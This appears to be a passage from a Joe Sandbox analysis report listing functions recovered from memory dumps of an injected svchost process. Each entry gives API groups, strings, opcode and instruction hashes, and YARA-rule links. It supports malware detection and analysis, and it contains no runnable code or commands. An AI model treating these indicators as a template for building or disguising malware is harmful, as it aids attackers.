                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: CD81B531E2C2E146FB57ABA994513D923F2AB4778CF5444A7EA4CC7796EB38C44D8700
                                                        Function 00000179537A9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 1c35a6318a95a9f66357ff113d1e6293aa460ab4329f98c61122d8ffc54845e1
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 5731D832B2E664E1EE13DB02A400BD963F4B74BBA8F5905279D5E47791EF38C45D8300
                                                        Function 00000179537B3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 1d5e788c20f4153e52296bcb8cadabdf0028e11074e208d04bdcdd6a952d3e19
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 1C11C431B18BA482F7518B52E864359B3B4F389FE8F044226EA9E87794EF38C4488744
                                                        Function 00000179537A3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 5fea20ec1214d5790932143d42f439680bcd659adb70575157f6ec8973a68838
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 76115E36B1875582FF159F52E4186A963B4FB4AB89F44002ADF8D07B54EF3DC509C714
                                                        Function 00000179537ACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 8609c7cee23a4da2cb73d7b9a2e9104af3180433e72c296c04d1e0e8fdc5031b
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: C811A270B2C26881FA2BA73259653E923715B477FCF144327A83E477DAEE28C5499200
                                                        Function 00000179537A199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 56b2cd84fcc0e7ced0197c83fadfe9882c07905c38d9d912c2a518943b9c5019
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 51016931B08A5482FB11DB52A8A879963B5F789BC8F888036DE8D43754EF3CC98DC704
                                                        Function 00000179537A36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: d2470d701e98e81108f06155ee65d957e7b349e728d52e6fd90ae972be3b8938
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: DD012D75B1975882FF269B62E86879573B0FB5AB8AF04042ACE8D07754EF3DC50C8704
                                                        Function 00000179537A9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 523c0386b4c626f6db8f57a49f1f760a6df895bac009b115f0e0608c5af323b5
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 0E51B232B2962886EB56DF15E448B9D37B6F347B8CF108126DA0E47788EB75CC59C704
                                                        Function 00000179537A8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 296e92441388b6fc06103b0115ebcdacb288d64441a59e498690bc521cbf3a7d
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 5531E032A2866896E716DF21E84879E37B4F743BCCF148016EE4E43788DB39C968C704
                                                        Function 00000179537A1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: de33d0b7403191fafe040a8392dc9819e369d541baf2522363be2d8de6ed28d3
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 65F03C72B1865592FB618F21E8D479A6771F749B8CF848022DA8D46A58EB2CC68DCB00
                                                        Function 00000179537ABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: f286dd60a5522db936dfed800217cc6c1f6d92c6ac24c710919bdd42c6a300c2
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 83F09671B2971481FB158B29E8647D96370EB8AB69F54021BCAAE463E4EF3CC44CC300
                                                        Function 00000179537A3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: bfab23f09705f7b99784b468b9aa13085e235c3ca8d88f22da8ea4acb8ae1034
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 55F05E70A18BA482EA418F52B92419A6371EB4EFC8F044032EE8E07B18EE3CC4498714
                                                        Function 00000179537A50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 898435458d9111b53b1cdb683c1f8426028e1d60795762d314f968d6b34372fa
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: EE02A73262DB9486E7A1CB55E49039AB7B1F3C5798F104116EACE87BA9DF7CC458CB00
                                                        Function 0000017953783504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 3cc9218a8b4e95386c2da3f1349016e86a73989eeb7d6784e7c61b0fa2066005
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: F511A73AE1DA3111FA5715FCE4413E993E0EB5B37CF48472BA97E067DACA68C84D4100
                                                        Function 00000179537B4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 1a93a27212db14d107c445d7083ca94b3231e77f583d31af7090b27211639dc1
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 16110632E1CF7821F666156AD4753E513706B7B3BCF080626A97E077D6FB24C8AC5211
                                                        Function 000001795377F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 7ae5aeff7bedc3f2e07649f4cc5b94845739e1ebc3c2fb1e68247ee672dcd3a0
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: AE619F32E0C66482FA67DB68E6443EE6BF0E78774CF554517CA2E177A4DA34C84AC220
                                                        Function 00000179537AAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 3a2af3483e4300a1187523e9586c3a768ce971fdbc56a475376103612aa46848
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: CD613632A19B988AEB619F69D4803DD77B0F74AB8CF144216EE4D17B98DB38C599C700
                                                        Function 000001795377A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 8b5f16ec00f45c4a7ced28edb1d3fb9ff7d8c5f0b459b66f842ca35e7ccd5795
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: C2517032908AA0CAFBA68F25954439877F0F39AB98F185117EF5D87BD5CB38D468C700
                                                        Function 00000179537AAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 643f0b19000955fd4531acc435b5a4dff8720e58fb8e76c4df4d970b4f056407
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 4F51B072928BA0CAEBB98F25948439D77B0F756B8DF184117DA9D47BD9CB38C468C700
                                                        Function 0000017953778405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 5ac530eb3dc6006a10c07ebfe96c76d79b6a881cc49be52fd1b4b670004edea5
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 1751BB32A09220AAEB57CF25E405B9837F5F352BDCF518126DA1E43788EB74E949CB04
                                                        Function 00000179537783E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: dc1ac7ef7cd5220de1efaa23918da90dfe07c950faa1f83c25e2fd2283a28f24
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 9831CB32A09660A6E713DF21E845B997BF4F342BDCF058116EE5E03788DB38E949CB04
                                                        Function 00000179537B2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 06d4593c12757a61a920345c0e2df76c0e129f7e16386725fafdea6654bba7a9
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: C5D1BF32B19A9489E712CFA9D4503DC3BB1F35AB9CF148216DE5E97B99EB34C50AC340
                                                        Function 00000179537A14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: bb6b78b593707857310a3324dd096787fdb4aa97373bc89aca0eb61e411b0d18
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: 1D118B36918AA8C6E716DF66A81818977B0F78AF89F084026EBCD43716EE38C458C744
                                                        Function 00000179537B2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: aa35c425ef9fc4d6b2506b4269cbb304a299e5433bf6d60ac2d50f473d078f8f
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: D191A032F1966485FB629F6594A03EE2BB0B746B8CF14410BDE4E67B95EF35C48AC700
                                                        Function 00000179537A7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 9256c04884558f9edc0885e3b789def796bf32de9d9fbb855d04952720b7616f
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: A6111C32B14B1989EB008B61E8543E833B4F71A75CF440E22DBAD467A4EB78C1A88380
                                                        Function 00000179537A253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 9464ef761ac9fd1665e8c61fdda8a34e1658d64a02c8beec298f218a00bbb3c3
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: AB71D736A287A146E766DF25D8443EA67B4F38678DF44002BDE4E53F89DE35C689C700
                                                        Function 0000017953779E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 4c013e113835d3432451d184c3eefa52352108669f7f627b66b82dfff524006d
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 0D615433A19B988AEB229F65D4807DD77B0F34AB8CF044616EE4D17B98DB78D199C700
                                                        Function 00000179537A94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 6bf90dc9676103b16e0bcc020ce2c1a8f578aef3304401d1f88f1bac78d3cb30
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: C8112B36619B9482EB628B15E44439A77F5F78AB98F584221EFCC07758EF3CC565CB00
                                                        Function 0000017953777356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: f60bf3152a5179fea1846c11251400d11a437752cd411464d01763722624210a
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 08E08671A44B5490DF038F61E8502D873B0DB59B68F499223995C46311FA38D1EEC300
                                                        Function 00000179537773B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
